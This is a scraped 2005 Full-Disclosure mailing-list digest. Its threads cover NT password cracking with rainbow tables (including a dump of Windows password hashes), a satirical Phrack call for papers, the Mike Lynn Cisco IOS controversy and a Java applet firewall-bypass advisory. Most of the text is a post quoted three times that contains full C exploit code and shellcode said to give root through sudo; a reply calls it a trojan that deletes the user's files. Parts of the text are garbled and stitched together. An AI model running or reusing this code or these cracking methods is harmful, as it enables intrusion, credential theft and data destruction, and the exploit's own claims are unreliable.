Re: [Full-disclosure] Best way to crack NT passwds

[X u r r o n]

i used http://www.loginrecovery.net for getting my lost passwd, passwd resetting is no prob. But i wanted to recover it. Thats a pay service but if you can wait for days then they give out ur recovered passwd for free. They had guessed my alphanum passwd in around 5 min.

On 7/31/05, Ken <[EMAIL PROTECTED]> wrote:
http://rainbowtables.shmoo.com-KenOn Jul 30, 2005, at 3:21 PM, Clement Dupuis wrote:
> Pre computed tables are the way to go.>> Considering the time it takes to compute them, you may as well buy> them.>> www.rainbowtables.net
 is a good place amongst others to get them.> Their key> difference is the variety they have and they keep expanding.>> Clement>>> ___
> Full-Disclosure - We believe in it.> Charter: http://lists.grok.org.uk/full-disclosure-charter.html> Hosted and sponsored by Secunia - 
http://secunia.com/>___Full-Disclosure - We believe in it.Charter: 
http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/-- Muhammad Shahid
Electrical EngineerX4ce.net Network AdministratorUCET, BZU, Multan.E-Mail: [EMAIL PROTECTED]Mobile: +92(300)6326611Web: 
http://www.x4ce.net 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Best way to crack NT passwds

[Ken]

http://rainbowtables.shmoo.com

-Ken

On Jul 30, 2005, at 3:21 PM, Clement Dupuis wrote:


Pre computed tables are the way to go.

Considering the time it takes to compute them, you may as well buy  
them.


www.rainbowtables.net is a good place amongst others to get them.   
Their key

difference is the variety they have and they keep expanding.

Clement


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Did you miss us yet?

[Phrack Staff]

-- 
 ... Phrack is dead. Long Live Phrack.
[-]=[-]

 +++
   =: P H R A C K - R E B O R N :=
 +++

   ... Phrack is dead. Long Live Phrack. 


   CALL FOR PAPERS * CALL FOR PAPERS * CALL FOR PAPERS

--
Deadline: 15 October 2005 at 11:59pm
Submissions: [EMAIL PROTECTED]
--

   The New Phrackstaff are pleased to bring you the third new
   release of PHRACK.

   As originally stated, Phrack strayed from its original purpose
   nearly 62 issues ago. Because of the irresponsible use of the
   Phrack forum, the commercialisation of hacking has been allowed
   to occur -- neigh -- encouraged. The old Phrack has been a long-time
   in dying. The past few issues have been coughing up blood (this
   could have been due to a severe case of industry rape). But now
   that death has come to the old Phrack, like Gene Gray, Phrack
   is reborn.

   Submissions should _NOT_ disclose new exploit methods, new backdooring
   methods, or any other information that may be used by the information
   security extortion industry to further increase their profit margins.

   Some article ideas:
 - White-hat 12 Step Program
aka. "OMFG I'm a white-hat, How do I Stop?"
 - B4 They were famous.
aka  "Profiles of White-hats they would like to forget."
 - HoneyNet Project: Be Your Enemy
 - Saved by Project Mayhem
 - Setting up your own "I'm a White-hat get me out of here" program.

   As a special treat to our readers, this CFP includes a sample
   of the material we look forward to bringing you, our new Phrack
   readership in the future. 

   

|=---=[ C O N T A C T   P H R A C K   M A G A Z I N E ]=-=|

Editors   : [EMAIL PROTECTED]
Submissions   : [EMAIL PROTECTED]
Commentary: [EMAIL PROTECTED]
Phrack World News : [EMAIL PROTECTED]
(ChiX|H4X)0r Porn : [EMAIL PROTECTED] -- We're open minded.

  ...
   #,..P
hr,  . ..   .Ac
'K#ph,   ..  .   .rAcK'
 #ph'Rac,.   ..K#P'Hra
  Ck'   #PHr  ...  .aCk'  #Ph
   rA,'cK#, .pHr'.AC
   'K#   'Phr,   .aCk'   #P'
  ...   rAc ' .K.#P Hra   ...
 .   cK#   .pHR  .a,   cK#   .
 . .. pH,   .rAc'  .  'k#P.HR. ..
 ..  .'Ac .K#' . 'PHr. ''..  .
 .   . aCk '   .'#PH,.   .
  ...  .rA.'cK'... '#PH,  ...
.rAc'k#, . .PH'rAc,
 .K#P'   'Hr   .   aC'   'k#P,
  .hRa'   cK#  .  pHr   'aCk,
   .#Ph' rAc __'K#P,
.HRACK#PHRACK#PHRACK#PHRACK#PHRACK#'.PH RAC#PHRACK#PHRACK#PHRa.
... cK'
 #Pr   aCk
  #Ph rAc
   K#,   .Ph
   'RA   CK'
#P. .hR
 aC.K#
  PhR
   A


   .
   Or contact us via seance




|=--=[ S A M P L E   A R T I C L E ]=--=| 


With the recent trend of everyone writing a book, the phrack staff have
taken a break from our usual research to give it a try. For your reading
enjoyment, we give you a sample chapter from our upcoming book, "Know
your enemy: The Security Industry". 

The first chapter is titled "The Art of Being Pwnd." I'm not sure I
like the title, but the rest of the staff tell me it fits. Give it a
read, and let us know what you think.


-
Chapter 1: 

The Art of Being Pwnd


If you don't like your job you don't strike. 
You just go in every day and do it really 
half-assed. Thats the American way.
-- Homer (Simpson)


It was another uneventful 2600 meeting for C1tiZ3n, the New-York kids
were bragging about their latest 'big' hack and passing around the new
Mitnick book, "The Art of Intrusion", while trying to avoid the advances
of Emanuel in his halter top purchased at CCC. For C1tiZ3n this was
particularly a concern, as he was unusually fit for a hacker, probably
lucky genetics. When things would get desperate, C1tiZ3n had taken to
pretending to listen to rebel, just

[Full-disclosure] RE: Cisco IOS Shellcode Presentation

[Neville Aga]

The presentation Larry posted is not the same presentation Mike Lynn
delivered at Blackhat. I was there and saw his presentation. It was
one of the best presentations I have ever seen. It was delivered with
intelligence and passion and care. I wonder when my time comes for
something like that I will have the fortitude to do what I believe to
be right under threats from a corporation as powerful as Cisco.  What
has been posted is irresponsible.

Michael was responsible with his information. The slides that are
posted here and are now going to float around the internet forever
have full text in the slides titled finding malloc() and finding
CreateThread(), complete with the critical offsets needed to reproduce
the attack. The slides he presented had all that blacked out. He gave
nothing to a blackhat attendee to go out and reproduce the attack
themselves. Instead he made a point about cisco IOS, namely:

1. You get one Cisco BGP internet router, it has a route to all other
routers and therefore a path to the entire network, not one system
(OK, you knew that)

2. Cisco IOS source code has been stolen at least twice. There is no
good reason to steal it other than to attack it. If Mike Lynn can
figure this one attack technique out, how many more attack techniques
can be figured out by people holding source code?

3. During the presentation, Mike Lynn said a substantial amount of his
research in this subject came from English translations of Chinese
hacking web sites. Consider That!!

4. Most importantly, the real threat here is a self replicating worm
that has a destructive payload to modify BGP routes or write back boot
sectors to make thousands of routers simultaneously useless (the
digital Pearl Harbor he alluded to). Mike said that that is not really
feasible today with this particular technique because the way code is
implemented you would need to know the exact IOS version and some
other hardware details for each router, so unless you have a 17MB worm
that has precompiled exploit code for each possible instance, then the
worm scenario is not possible, and a 17MB worm is not practical.

4A. However (consider this one reason why Mike may ultimately be
remembered as a hero) Cisco's roadmap is moving to a new memory
structure where the offsets would be the same for all hardware. That
could make your router worm a real possibility, not with this exploit
(I am sure everyone will patch their routers to prevent this exploit),
but with the next flaw someone else figures out. Do you think Cisco
may reconsider that design after this? I certainly think they will, or
else they should have their collective head examined. Remember, some
Chinese hackers were already thinking down these paths before Mike
was.


In my opinion a real loser in all this is ISS. The strength of any
company is its people. Management should trust and defend their best
and brightest, not sue them and force them to resign. In the case of
illegal activities of course management has no obligation to defend
criminals. However that is not what happened here. Cisco saying this
was illegal did not make it so. The talk was delivered in a
responsible and professional way. ISS did not care to see the details
and the way Mike presented this particular talk, they just caved to
Cisco pressure, co-suing Mike with Cisco to make Mike look like a
rogue and becoming a puppet for a business partner instead of helping
an employee.


Neville
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Undisclosed Sudo Vulnerability ?

[Kurt Seifried]

This is a trojan that will nuke all the files owned by the user running it.

-Kurt

- Original Message - 
From: "Esler, Joel - Contractor" <[EMAIL PROTECTED]>

To: 
Sent: Saturday, July 30, 2005 12:40 PM
Subject: [Full-disclosure] Undisclosed Sudo Vulnerability ?



About two weeks ago, our proprietary LIDS detected some suspicious shell
activity on an internal .mil machine i am in charged of. Our server runs
latest up2date Debian GNU/Linux on 2.4.31 x86 with grsec/PaX enabled.
Before shutting down the machine and reinstalling it from scratch, we
installed sebek module to monitor all shell activity. Based on the data
we gathered, it seems the attacker gained root privileges using an
undisclosed bug in latest sudo.

$ uname -a
Linux syslog 2.4.31-grsec #1 SMP Tue Jun 21 09:10:06 EDT 2005 i686 
GNU/Linux


$ sudo -V
Sudo version 1.6.8p9

$ ls -al /tmp/.phc
-rwsr-xr-x  1 root root 304873 Jul 05 03:45 /tmp/.phc

Here is an excerpt of a shell session we recorded:

<.>
$ cat >blaat.uue<<'EH'








EH
$ uudecode blaat.uue
$ cat sudoh.c
/*
*  off by one ebp overwrite in sudo prompt parsing func (bground mode 
only)

*
*  "y0, don't abuse this priv8 exploit to rm boxes. k,thx" - Richard 
Johnson

*
*  gcc -pipe -o sudoh sudoh.c ; ./sudoh
*
*  happy deathday route
*
*/

#include 
#include 
#include 
#include 


#define SUDO_PROMPT "[EMAIL PROTECTED]> \\%"
#define shellcode   esp
#define RETS_NUM246 /* generic */
#define NOPS_NUM116 /* generic */


/*
*  Linux x86 non-interactive exec
*  {0,1,2} fds are closed upon execution of shellcode (use "/bin/sh -c")
*/

char esp[] __attribute__ ((section(".text"))) /* e.s.p release */
   = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
 "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
 "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
 "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
 "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
 "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
 "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
 "cp -p /bin/sh /tmp/.phc; chmod 4755 /tmp/.phc;";
/* = "\xcc\xeb\xfe"; */



void fill (char *buff, int size, unsigned long val)
{
   unsigned long *ptr = (unsigned long *) buff;

   for (size /= sizeof (unsigned long); size > 0; size--) *ptr++ = 
val;

}


unsigned long get_sp (void)
{
   __asm__ ("lea esp, %eax");
}


char *th30_iz_own3d (char nops_nums, char rets_nums, char *shellcode)
{
   int size = strlen (SUDO_PROMPT) + nops_nums + rets_nums + strlen 
(shellcode);

   unsigned char *nops = alloca (nops_nums);
   unsigned char *rets = alloca (rets_nums);
   unsigned long ret = get_sp ();
   static char exp_buffer [8192];

   /* make sure sudo isatty() fails */
   close (0); close (1); close (2);

   fill (nops, (unsigned char) nops_nums, 0x90909090);
   fill (rets, (unsigned char) rets_nums, ret);

   /* be nice plz */
   if (size > sizeof (exp_buffer)) {
   fprintf (stderr, "buffer's t00 small..\n");
   return NULL;
   }

   snprintf (exp_buffer, sizeof (exp_buffer), "%s%s%s%s",
 SUDO_PROMPT, /* evilz prompt */
 nops,
 shellcode,
 rets);

   /* exploit buff */
   return exp_buffer;
}



int main(int argv, char *argc[])
{
   char *exploit = th30_iz_own3d (NOPS_NUM, RETS_NUM, shellcode);

   /* thanks again T0dd :) */

   execl ("/usr/bin/sudo", "/usr/bin/sudo", "-b", "-p", exploit, 
"/bin/false", NULL);


   /* ok, shellroot should await you @ "HISTFILE=/dev/null 
/tmp/.phc -p" */


   return 0;
}

$ gcc -pipe -o sudoh sudoh.c
{standard input}: Assembler messages:
{standard input}:5: Warning: Ignoring changed section attributes for .text
$ ./sudoh
$ cat /bin/cat > blaat.uue; rm blaat.uue
$ cat /bin/cat > sudoh.c; rm sudoh.c
$ cat /bin/cat > sudoh; rm sudoh
$ HISTFILE=/dev/null /tmp/.phc -p
id
uid=65534(nobody) gid=65534(nobody) euid=0(root) groups=65534(nobody)
<.>


Todd Miller, the maintainer of Sudo has been informed yesterday, and it
is strongly advised to "sudo su -c chmod -s sudo" until a patch is out.


J

Joel Esler, GCIA
[EMAIL PROTECTED]
706-791-7165 DSN: 780-7165
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Undisclosed Sudo Vulnerability ?

[Kurt Seifried]

This is a trojan that will nuke all the files owned by the user running it.

-Kurt

- Original Message - 
From: "Esler, Joel - Contractor" <[EMAIL PROTECTED]>

To: 
Sent: Saturday, July 30, 2005 12:40 PM
Subject: [Full-disclosure] Undisclosed Sudo Vulnerability ?



About two weeks ago, our proprietary LIDS detected some suspicious shell
activity on an internal .mil machine i am in charged of. Our server runs
latest up2date Debian GNU/Linux on 2.4.31 x86 with grsec/PaX enabled.
Before shutting down the machine and reinstalling it from scratch, we
installed sebek module to monitor all shell activity. Based on the data
we gathered, it seems the attacker gained root privileges using an
undisclosed bug in latest sudo.

$ uname -a
Linux syslog 2.4.31-grsec #1 SMP Tue Jun 21 09:10:06 EDT 2005 i686 
GNU/Linux


$ sudo -V
Sudo version 1.6.8p9

$ ls -al /tmp/.phc
-rwsr-xr-x  1 root root 304873 Jul 05 03:45 /tmp/.phc

Here is an excerpt of a shell session we recorded:

<.>
$ cat >blaat.uue<<'EH'








EH
$ uudecode blaat.uue
$ cat sudoh.c
/*
*  off by one ebp overwrite in sudo prompt parsing func (bground mode 
only)

*
*  "y0, don't abuse this priv8 exploit to rm boxes. k,thx" - Richard 
Johnson

*
*  gcc -pipe -o sudoh sudoh.c ; ./sudoh
*
*  happy deathday route
*
*/

#include 
#include 
#include 
#include 


#define SUDO_PROMPT "[EMAIL PROTECTED]> \\%"
#define shellcode   esp
#define RETS_NUM246 /* generic */
#define NOPS_NUM116 /* generic */


/*
*  Linux x86 non-interactive exec
*  {0,1,2} fds are closed upon execution of shellcode (use "/bin/sh -c")
*/

char esp[] __attribute__ ((section(".text"))) /* e.s.p release */
   = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
 "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
 "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
 "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
 "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
 "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
 "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
 "cp -p /bin/sh /tmp/.phc; chmod 4755 /tmp/.phc;";
/* = "\xcc\xeb\xfe"; */



void fill (char *buff, int size, unsigned long val)
{
   unsigned long *ptr = (unsigned long *) buff;

   for (size /= sizeof (unsigned long); size > 0; size--) *ptr++ = 
val;

}


unsigned long get_sp (void)
{
   __asm__ ("lea esp, %eax");
}


char *th30_iz_own3d (char nops_nums, char rets_nums, char *shellcode)
{
   int size = strlen (SUDO_PROMPT) + nops_nums + rets_nums + strlen 
(shellcode);

   unsigned char *nops = alloca (nops_nums);
   unsigned char *rets = alloca (rets_nums);
   unsigned long ret = get_sp ();
   static char exp_buffer [8192];

   /* make sure sudo isatty() fails */
   close (0); close (1); close (2);

   fill (nops, (unsigned char) nops_nums, 0x90909090);
   fill (rets, (unsigned char) rets_nums, ret);

   /* be nice plz */
   if (size > sizeof (exp_buffer)) {
   fprintf (stderr, "buffer's t00 small..\n");
   return NULL;
   }

   snprintf (exp_buffer, sizeof (exp_buffer), "%s%s%s%s",
 SUDO_PROMPT, /* evilz prompt */
 nops,
 shellcode,
 rets);

   /* exploit buff */
   return exp_buffer;
}



int main(int argv, char *argc[])
{
   char *exploit = th30_iz_own3d (NOPS_NUM, RETS_NUM, shellcode);

   /* thanks again T0dd :) */

   execl ("/usr/bin/sudo", "/usr/bin/sudo", "-b", "-p", exploit, 
"/bin/false", NULL);


   /* ok, shellroot should await you @ "HISTFILE=/dev/null 
/tmp/.phc -p" */


   return 0;
}

$ gcc -pipe -o sudoh sudoh.c
{standard input}: Assembler messages:
{standard input}:5: Warning: Ignoring changed section attributes for .text
$ ./sudoh
$ cat /bin/cat > blaat.uue; rm blaat.uue
$ cat /bin/cat > sudoh.c; rm sudoh.c
$ cat /bin/cat > sudoh; rm sudoh
$ HISTFILE=/dev/null /tmp/.phc -p
id
uid=65534(nobody) gid=65534(nobody) euid=0(root) groups=65534(nobody)
<.>


Todd Miller, the maintainer of Sudo has been informed yesterday, and it
is strongly advised to "sudo su -c chmod -s sudo" until a patch is out.


J

Joel Esler, GCIA
[EMAIL PROTECTED]
706-791-7165 DSN: 780-7165
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Mike Lynn's controversial CiscoSecurity Presentation

[Fetch, Brandon]

I'm kinda looking forward to that offering of a Guinness!

Who'd like to offer me one in DFW, Tx?  I've seen it!

;-)

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] Behalf Of
[EMAIL PROTECTED]
Sent: Friday, July 29, 2005 9:21 PM
To: Russell Smoak
Cc: full-disclosure@lists.grok.org.uk; nanog@merit.edu;
[EMAIL PROTECTED]
Subject: Re: [Full-disclosure]  Mike Lynn's controversial
CiscoSecurity Presentation 


On Fri, 29 Jul 2005 13:11:57 CDT, Russell Smoak said:
> All,
> 
> These recipients received an email from Austin Mckinley as Cisco Systems.
> 
> This messasge was sent in complete error and includes intellectual
> property of ISS and Cisco Systems.  Please delete and do not distrbute
> the information any further.

Unfortunately, there has been a temporal discontinuity between the departure
of the quadrupeds and the closing of the barn doors.

There's only two ways to *effectively* deal with this one:

a) Commence massive neural wipes of anybody who *might* have seen it.

b) Obtain *and* *enforce* a permanent injunction banning anybody who's already
seen it from meeting anybody who hasn't seen it in any establishment that
serves Guiness.

deCSS, anybody? ;)


This message is intended only for the person(s) to which it is addressed 
and may contain privileged, confidential and/or insider information. 
If you have received this communication in error, please notify us 
immediately by replying to the message and deleting it from your computer. 
Any disclosure, copying, distribution, or the taking of any action concerning
the contents of this message and any attachment(s) by anyone other 
than the named recipient(s) is strictly prohibited.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Undisclosed Sudo Vulnerability ?

[Esler, Joel - Contractor]

About two weeks ago, our proprietary LIDS detected some suspicious shell
activity on an internal .mil machine i am in charged of. Our server runs
latest up2date Debian GNU/Linux on 2.4.31 x86 with grsec/PaX enabled.
Before shutting down the machine and reinstalling it from scratch, we
installed sebek module to monitor all shell activity. Based on the data
we gathered, it seems the attacker gained root privileges using an
undisclosed bug in latest sudo.

$ uname -a
Linux syslog 2.4.31-grsec #1 SMP Tue Jun 21 09:10:06 EDT 2005 i686 GNU/Linux

$ sudo -V
Sudo version 1.6.8p9

$ ls -al /tmp/.phc
-rwsr-xr-x  1 root root 304873 Jul 05 03:45 /tmp/.phc

Here is an excerpt of a shell session we recorded:

<.>
$ cat >blaat.uue<<'EH'
begin 600 sudoh.c
M+RH*("H@(&]F9B!B>2!O;[EMAIL PROTECTED])P(&]V97)W2!D96%T:&1A
M>2!R;[EMAIL PROTECTED]@[EMAIL 
PROTECTED]"B-I;F-L=61E(#QS=&1I;RYH/@HC:6YC;'5D92`\
M=6YI<[EMAIL PROTECTED]"B-I;F-L=61E(#QS=')I;F[EMAIL 
PROTECTED](&YO;BUI;G1E&5C"B`J("![,"PQ
M+#)](&9D#-E7'@U8EQX,S%<>&,P7'@U,%QX-31<>#5A7'@X,UQX
M96-<>#8T7'@V."(*"0D@(")<>&9F7'AF9EQX9F9<>&9F7'@V.%QX9&9<>&0P
M7'AD9EQX9#E<>#8X7'@X9%QX.3DB"@D)("`B7'AD9EQX.#%<>#8X7'@X9%QX
M.3)<>&1F7'AD,EQX-31<>#5E7'AF-UQX,39<>&8W(@H)"2`@(EQX-39<>#`T
M7'AF-UQX-39<>#`X7'AF-UQX-39<>#!C7'@X,UQX8S1<>##AD7'@W,UQX,#A<>#4V7'@U,UQX-31<>#4Y7'AB,%QX,&)<>&-D7'@X
M,%QX,S$B"@D)("`B7'AC,%QX-#!<>&5B7'AF.5QX93A<>&)D7'AF9EQX9F9<
M>&9F7'@R9EQX-C)<>#8Y(@H)"2`@(EQX-F5<>#)F7'@W,UQX-CA<>#`P7'@R
M9%QX-C-<>#`P(@H)"2`@(F-P("UP("]B:6XO&9E([EMAIL PROTECTED]"@H*=F]I9"!F:6QL("AC:&%R("IB=69F+"!I;G0@F5O
M9B`H=6YS:6=N960@;&]N9RD[('-I>F4@/B`P.R!S:7IE+2TI("IP='(K*R`]
M('9A;#L*?0H*"G5N"(I.PI]"@H*8VAAE]O=VXS
M9"`H8VAAF5O9B`H
M97AP7V)U9F9EF5O9B`H97AP7V)U9F9E'!L;VET([EMAIL 
PROTECTED]&@S,%]I>E]O
M=VXS9"`H3D]04U].54TL(%)%5%-?3E5-+"!S:&5L;&-O9&4I.PH*"2\J('1H
M86YK'!L;VET+"`B+V)I
M;B]F86QS92(L($Y53$PI.PH*("`@("`@("`O*B!O:RP@
#include 
#include 
#include 


#define SUDO_PROMPT "[EMAIL PROTECTED]> \\%"
#define shellcode   esp
#define RETS_NUM246 /* generic */
#define NOPS_NUM116 /* generic */


/*
 *  Linux x86 non-interactive exec
 *  {0,1,2} fds are closed upon execution of shellcode (use "/bin/sh -c")
 */

char esp[] __attribute__ ((section(".text"))) /* e.s.p release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
  "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
  "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
  "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
  "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
  "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
  "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
  "cp -p /bin/sh /tmp/.phc; chmod 4755 /tmp/.phc;";
 /* = "\xcc\xeb\xfe"; */



void fill (char *buff, int size, unsigned long val)
{
unsigned long *ptr = (unsigned long *) buff;

for (size /= sizeof (unsigned long); size > 0; size--) *ptr++ = val;
}


unsigned long get_sp (void)
{
__asm__ ("lea esp, %eax");
}


char *th30_iz_own3d (char nops_nums, char rets_nums, char *shellcode)
{
int size = strlen (SUDO_PROMPT) + nops_nums + rets_nums + strlen 
(shellcode);
unsigned char *nops = alloca (nops_nums);
unsigned char *rets = alloca (rets_nums);
unsigned long ret = get_sp ();
static char exp_buffer [8192];

/* make sure sudo isatty() fails */
close (0); close (1); close (2);

fill (nops, (unsigned char) nops_nums, 0x90909090);
fill (rets, (unsigned char) rets_nums, ret);

/* be nice plz */
if (size > sizeof (exp_buffer)) {
fprintf (stderr, "buffer's t00 small..\n");
return NULL;
}

snprintf (exp_buffer, sizeof (exp_buffer), "%s%s%s%s",
  SUDO_PROMPT, /* evilz prompt */
  nops,
  shellcode,
  rets);

/* exploit buff */
return exp_buffer;
}



int main(int argv, char *argc[])
{
char *exploit = th30_iz_own3d (NOPS_NUM, RETS_NUM, shellcode);

/* thanks again T0dd :) */

execl ("/usr/bin/sudo", "/usr/bin/sudo", "-b", "-p", exploit, 
"/bin/false", NULL);

/* ok, shellroot should await you @ "HISTFILE=/dev/null /tmp/.phc -p" */

return 0;
}

$ gcc -pipe -o sudoh sudoh.c
{standard input}: Assembler messages:
{standard input}:5: Warning: Ignoring changed section attributes for .text
$ ./sudoh
$ cat /bin/cat > blaat.uue; rm blaat.uue
$ cat /bin/cat > sudoh.c; rm sudoh.c
$ cat /bin/cat > sudoh; rm sudoh
$ HISTFILE=/dev/null /tmp/.phc -p
id
uid=65534(nobody) gid=65534(nobody) euid=0(root) groups=65534(nobody)
<.>


Todd Miller, the maintainer of Sudo has been informed yesterday, and it
is strongly advised to "sudo su -c chmod -s sudo" until a patch is out.


J

Joel Esler, GCIA
[EMAIL PROTECTED]
706-791-7165 DSN: 780-7165
__

[Full-disclosure] The Java applet sandbox and stateful firewalls

[Florian Weimer]

The Java/Firewall vulnerability
===

Current version: 

The Java sandbox for applets and stateful firewalls interact in a
surprising way. As a result, external hosts can initiate TCP
connections to supposedly protected network services.

* Attack Requirements

This is a passive attack. The attacker must lure the victim to a
carefully crafted web page. The victim's web browser must download and
execute the embedded Java applet. The victim's computer must offer
some vulnerable networking service, and a stateful firewall must
prevent access to this service from the Internet.  Impact

An attacker can gain access to potentially vulnerable network services
which are located behind firewall and/or NAT devices, so that direct
access is impossible.

* Severity

This is a passive vulnerability which can only be used as a stepstone
for further attacks. As a result, the risk posed by this vulnerability
alone is fairly low.

* Technical Description

The attack is carried out as follows.

   1. The attacker creates a specifically crafted web site.

   2. She lures the victim to visit this web site.

   3. The victim's browser downloads the applet and begins to run it.

   4. The applet initiates a TCP connection back to the originating
  web server, on port 21 (used by FTP, RFC 959). This connection
  is permitted according to the standard Java sandbox model for
  applets.  5.

  A FTP server on the same machine that hosts the originating web
  site answers.

   6. The applet continues to pose as an FTP client, logs in and
  issues an FTP PORT command, which prepares an active FTP
  connection. The TCP port specified in the command refers to some
  existing TCP service, such as 445/TCP (SMB over TCP) or 1433/TCP
  (Microsoft SQL Server, MSDE). This port is chosen by the
  attacker.

   7. The firewall between the attacker and the victim recognizes this
  command and prepares to open a second connection for the FTP
  data transfer.

   8. The applet issues a FTP command which requests the data
  transfer, for example a LIST command.

   9. The attacker uses her server to initiate a TCP connection to the
  port indicated in the PORT on the victim host. The firewall
  passes through the connection, assuming that it is a legitimate
  FTP data transfer.

This attack exploits the fact that the Java security model for applet
assumes that arbitrary TCP connections back to the server pose no
risks. However, the presence of stateful firewalls or NAT devices with
heuristic FTP protocol modules between the involved hosts invalidates
this assumption because TCP connections back to the originating
servers do have side effects.

This is not an error in the Java implementation or in the firewall
implementation. Both programs implement their respective
specifications. Even the specifications themselves are not inherently
flawed. Only the combination of these two components creates a
vulnerable configuration. This stresses an important point about
secure systems: Security does not compose, and classic
divide-and-conquer approaches do not necessarily result in complete
systems which are secure.

The attack differs from previous attacks using POST requests to ports
such as 21/FTP. Such attacks could be detected by the firewall and
stopped. In contrast, the Java applet could implement a
fully-compliant FTP client, and the firewall cannot tell whether an
FTP data transfer was initiated by a rogue Java applet or a legitimate
FTP client controlled by the user.

* Workarounds

* Use clients that do not support active client such as Java
  applets.

* In firewalls, do not use heuristic approaches to stateful
  filtering. Complex protocols should be handled by application
  layer gateways that actually understand the protocols they are
  letting through.

Note that in principle, this vulnerability is not specific to Java or
FTP protocol helpers (see below). A more general approach to eradicate
this problem is therefore necessary.

* Proof of concept

A simple TCP server which emulates FTP and a corresponding Java applet
is provided on the web: 

* Open questions

Some questions need further examination.

* Other implementations of mobile code might be used to carry out
  the attack. For example, it could be possible that Flash objects
  can achieve the same effect.

* The vulnerability is not inherently FTP-related. FTP is used
  here because its active mode is widely used because it is the
  default mode in a widely-used web browser, and stateful filters
  usually implement heuristics to handle such FTP data
  transfers. Other candidate protocols are IRC DCC, Sun and DCE
  RPC, and in particular H.323 and SIP.

* We only tested one firewalling implementation (a custom-compiled
  Linux 2.6 kernel 

RE: [Full-disclosure] Best way to crack NT passwds

[Clement Dupuis]

Pre computed tables are the way to go.

Considering the time it takes to compute them, you may as well buy them.

www.rainbowtables.net is a good place amongst others to get them.  Their key
difference is the variety they have and they keep expanding.

Clement


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Best way to crack NT passwds

[[EMAIL PROTECTED]]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Yup this application is probably the best for lm hashes , the main 
problem is then to generate a table as the alphanumsymbol15 one, 
basically it takes a lot of time , around 6months on only 1 comp 
1ghz, else you can still find some nice free services as 
http://milw0rm.com/md5 and some other similiar websites, but I guess 
their queue is full, nor the best solution is to look at the official 
rbcrack website, the founder is selling alphanumsymbol15 if I 
remember, nor on 20 computers 3Ghz you can expect 2weeks, 'shrink' 
purdue :>


At 15:32 30/07/05, Paul Farrow wrote:
Yup after I posted that I read your post, have to admit, searching a 
table full of hashes would be a hell of alot quicker than cracking 
it manually :]
But then again, I rarely crack any hashes (good memory for my own 
passwords) but anything for md5 i use passcracking.net/com.
But i suppose it wouldnt be difficult to code up a quick php page to 
fill a mysql dbase with incremental hashes generated on the fly... 
might look into it
(even though its no doubt been done) fun project for a rainy day i 
suppose.


[EMAIL PROTECTED] wrote:


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

rainbow crack finds this pass "Test0r" in 5-10sec and you doesn't 
need an huge machine to get it, if you like johnthe ripper, I 
heavly suggest you to generate your tables and start using rbcrack, 
because you are loosing your time on john, believe me :)


At 12:25 30/07/05, Paul Farrow wrote:

Chances are the system used by the website was a multi-processor 
beast of machine, able to maximise cpu time to cracking the 
passwords.
If you can get the password hash, then your best bet is to run it 
through jtr(john the ripper).


C:\toolkit\passwords\pwdump> pwdump2
Administrator:500:62b239ea3de3b4142e04d2d295f821b0:a929535485de3b50889
23fd58d02cca2:::
ASPNET:1000:f5052a93de1b6a7848d83fff52bb5c55:264d62a5f32f74bb6df2642a5
14fd17f:::
